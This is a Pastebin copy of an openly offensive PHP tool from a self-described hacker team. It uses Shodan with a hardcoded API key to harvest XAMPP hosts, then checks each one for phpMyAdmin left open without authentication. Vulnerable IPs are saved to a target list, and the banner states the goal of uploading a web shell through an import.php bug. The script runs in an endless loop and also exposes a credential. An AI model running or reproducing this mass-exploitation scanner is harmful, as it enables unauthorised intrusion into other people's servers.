API tools faq
paste
Advertisement
shor7cut

Auto Exploit : Xampp PHPMYADMIN (Fix)

shor7cut
Jul 26th, 2015
1,493
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.67 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4. date_default_timezone_set('asia/jakarta');
  5. cover();
  6. cari_target();
  7. echo "\r\n--------------------------------------\r\n";
  8. function cari_target() {
  9. unlink("target_shor7cut.txt");
  10. //$name_output = "K-exploit-".date("d-m-Y@his").$extension;
  11. $name_output = "K-EXPLOIT.HTML";
  12.  
  13.  
  14.  
  15. // SETTING \\
  16. $no=1;
  17. $nos=1;
  18. $success=0;
  19. $fail=0;
  20. $auth=0;
  21. $dbaru=0;
  22. $api = "z3cBefrV3bmRx2rNZ0E1opuZxXNPrbIR";
  23. $name_lapor = "Laporan.txt";
  24. if($api==""){
  25. echo "[!] Ops... Get Your api in account.shodan.io\r\n";
  26. quit();
  27. }
  28. $total_target=0;
  29. // END:SETTING \\
  30. $dork = array (
  31. 'xampp',
  32. 'xampp Apache/2.2.3',
  33. 'xampp Apache/2.2.4',
  34. 'xampp Apache/2.2.6',
  35. 'xampp Apache/2.2.8',
  36. 'xampp Apache/2.2.9',
  37. 'xampp Apache/2.2.11',
  38. 'xampp Apache/2.2.12',
  39. 'xampp Apache/2.2.14',
  40. 'xampp Apache/2.2.17',
  41. 'xampp Apache/2.2.21',
  42. 'xampp Apache/2.4.2',
  43. 'xampp Apache/2.4.3',
  44. 'xampp Apache/2.4.10',
  45. 'xampp Apache/2.4.12',
  46. 'xampp PHP/5.2.1',
  47. 'xampp PHP/5.2.2',
  48. 'xampp PHP/5.2.3',
  49. 'xampp PHP/5.2.4',
  50. 'xampp PHP/5.2.5',
  51. 'xampp PHP/5.2.6',
  52. 'xampp PHP/5.2.8',
  53. 'xampp PHP/5.2.9',
  54. 'xampp PHP/5.3.0',
  55. 'xampp PHP/5.3.1',
  56. 'xampp PHP/5.3.5',
  57. 'xampp PHP/5.3.8',
  58. 'xampp PHP/5.4.4',
  59. 'xampp PHP/5.4.7',
  60. 'xampp PHP/5.4.31',
  61. 'xampp PHP/5.5.15',
  62. 'xampp PHP/5.5.19',
  63. 'xampp PHP/5.6.3',
  64. 'xampp PHP/5.5.24',
  65. 'xampp PHP/5.6.8',
  66. 'xampp PHP/4.4.5',
  67. 'xampp PHP/4.4.6',
  68. 'xampp PHP/4.4.7',
  69. 'xampp PHP/4.4.8',
  70. 'xampp PHP/4.4.9'
  71. );
  72.  
  73. $total_dork = count($dork);
  74.  
  75.  
  76.  
  77. foreach ($dork as $dorks) {
  78. $noms = "(".$no."/".$total_dork.")";
  79. echo "(+) Mencari Target : ".$noms."\r\n(+) scanned in ";
  80. $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api}&query={$dorks}");
  81. $json = json_decode($get,true);
  82.  
  83. foreach ($json['matches'] as $key => $value) {
  84.  
  85. $fp = fopen("target_shor7cut.txt", 'a+');
  86. fwrite($fp, $value['ip_str']."|");
  87. fclose($fp);
  88.  
  89. } // End Foreach
  90. $target_live = $json['total'];
  91. if($target_live>100){
  92. $target_live=100;
  93. }
  94. $total_target=$target_live+$total_target;
  95. echo round((microtime(true)-$_SERVER['REQUEST_TIME_FLOAT']),2)." Seconds | Found -> ".$target_live." \r\n\n";
  96. $no++;
  97. }
  98. echo "[+] Total Target : [".$total_target."]\r\n";
  99. $buka_file = fopen("target_shor7cut.txt", "r");
  100. $baca_file = fgets($buka_file);
  101. $target = explode("|", $baca_file);
  102. echo "[+] Memulai Mencari vulnerable\r\n";
  103. loading();
  104. echo "\r\n";
  105. $start = date("d-m-Y h:i:sa");
  106. foreach ($target as $sites) {
  107. $infos = "Scan : $sites (".$nos."/".$total_target.") - ".$name_output;
  108. echo "-> Info : (".$nos."/".$total_target.") | [S:".$success."/F:".$fail."/A:".$auth."] (DB: ".$dbaru.")\r\n";
  109. echo "-> Target : ".$sites."\r\n";
  110. echo "-> PhpMyadmin : ";
  111. $url = "http://$sites/phpmyadmin/querywindow.php";
  112. $phpmyn = curl_init("$url");
  113. curl_setopt($phpmyn, CURLOPT_FAILONERROR, true);
  114. curl_setopt($phpmyn, CURLOPT_FOLLOWLOCATION, true);
  115. curl_setopt($phpmyn, CURLOPT_RETURNTRANSFER, true);
  116. curl_setopt($phpmyn, CURLOPT_CONNECTTIMEOUT ,0);
  117. curl_setopt($phpmyn, CURLOPT_TIMEOUT, 30);
  118. $phpmynresult = curl_exec($phpmyn);
  119. $re = "/<input type=\"hidden\" name=\"token\" value=\"(.*)\"/";
  120. if(preg_match($re, $phpmynresult, $matches)){
  121. if(preg_match_all("/pma_password/", $phpmynresult, $matx)){
  122. echo "Not vulnerable (Auth)\r\n";
  123. $auth++;
  124. }else {
  125. echo "vulnerable\r\n";
  126.  
  127. $hasil_output='<a href="'.$url.'" target=_blank>http://'.$sites.'</a><br>';
  128.  
  129. //-----------------------------------------------------------------\\
  130. //--- JIKA ADA TARGET YANG SAMA MAKA DATA TIDAK DI SIMPAN DI DATABASE
  131. //--- JIKA INGIN MENGHILANGKAN FUNGSI INI SILAHKAN EDIT SENDIRI
  132. //--- Hapus Script yang sudah saya tandai // START // END
  133. //--- Ganti dengan Script dibawah ini
  134. /*
  135. $fp = fopen($name_output, 'a+');
  136. fwrite($fp, $hasil_output);
  137. fclose($fp);
  138. */
  139. //-----------------------------------------------------------------\\
  140.  
  141. //start
  142. $buka_file = file_get_contents($name_log);
  143. if(!eregi($sites, $buka_file)){
  144. //save result
  145. $fp = fopen($name_output, 'a+');
  146. fwrite($fp, $hasil_output);
  147. fclose($fp);
  148. //save log
  149. $fp = fopen("logs_shor7cut.txt", 'a+');
  150. fwrite($fp, $sites."\r\n");
  151. fclose($fp);
  152. echo "-> Save-DB : Telah Ditambahkan\r\n";
  153. }else {
  154. echo "-> Save-DB : Tidak Ditambahkan\r\n";
  155. }
  156.  
  157.  
  158. //end
  159.  
  160.  
  161. $success++;
  162. }
  163. }else {
  164. echo "Not vulnerable\r\n";
  165. $fail++;
  166. }
  167. echo "-> Check Done in ".round((microtime(true)-$_SERVER['REQUEST_TIME_FLOAT']),2)." Seconds\r\n\n";
  168. $nos++;
  169.  
  170. }
  171.  
  172. $lapor.= "\r\n\n---------------------------------------\r\n";
  173. $lapor.= " > LAPORAN AKHIR <\r\n";
  174. $lapor.= "\r\n---------------------------------------\r\n";
  175. $lapor.= "-> Total Target : ".$total_target."\r\n";
  176. $lapor.= "-> Total Success :".$success."\r\n";
  177. $lapor.= "-> Total fail :".$fail."\r\n";
  178. $lapor.= "-> Total Auth :".$auth."\r\n";
  179. $lapor.= "-> Total Target Baru :".$dbaru."\r\n";
  180. $lapor.= "-> Output File :".$name_output."\r\n";
  181. $lapor.= "-> Start Scan : ".$start."\r\n";
  182. $lapor.= "-> End Scan : ".date("d-m-Y h:i:sa");
  183. echo $lapor;
  184. $fp = fopen($name_lapor, 'a+');
  185. fwrite($fp, $lapor);
  186. fclose($fp);
  187.  
  188.  
  189. loadings();
  190.  
  191.  
  192.  
  193.  
  194.  
  195. } // akhir fungsi
  196. function loadings() {
  197. cari_target();
  198. }
  199. function loading() {
  200. echo "-> Pleas wait ";
  201. for ($i=0; $i <3; $i++) {
  202. echo ".";
  203. sleep(1);
  204. echo " ";
  205. sleep(1);
  206. } echo "\r\n";
  207. }
  208.  
  209.  
  210. function cover() {
  211. $shor7cut.=" .---. \r\n";
  212. $shor7cut.=" |---| \r\n";
  213. $shor7cut.=" |---| \r\n";
  214. $shor7cut.=" |---| > K-Xploit PhpMyadmin (Multy Killer) < \r\n";
  215. $shor7cut.=" .---^ - ^---. \r\n";
  216. $shor7cut.=" :___________: Code By Shor7cut (Bug7sec Team) \r\n";
  217. $shor7cut.=" | |//| \r\n";
  218. $shor7cut.=" | |//| [DESCRIPTION] \r\n";
  219. $shor7cut.=" | |//| Looking for Target using shodan \r\n";
  220. $shor7cut.=" | |//| Then proceed to search \r\n";
  221. $shor7cut.=" | |.-| Phpmyadmin which has the bug import.php \r\n";
  222. $shor7cut.=" |.-'**| So that we can upload shell \r\n";
  223. $shor7cut.=" \***/ Through the bug import.php \r\n";
  224. $shor7cut.=" \*/ \r\n";
  225. $shor7cut.=" V Thank's : Tuban Cyber Team | IndoXploit | ISD-TEAM \r\n";
  226. $shor7cut.=" Yogyakarta Black Hat | Suram-Crew \r\n";
  227. echo $shor7cut;
  228. } ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!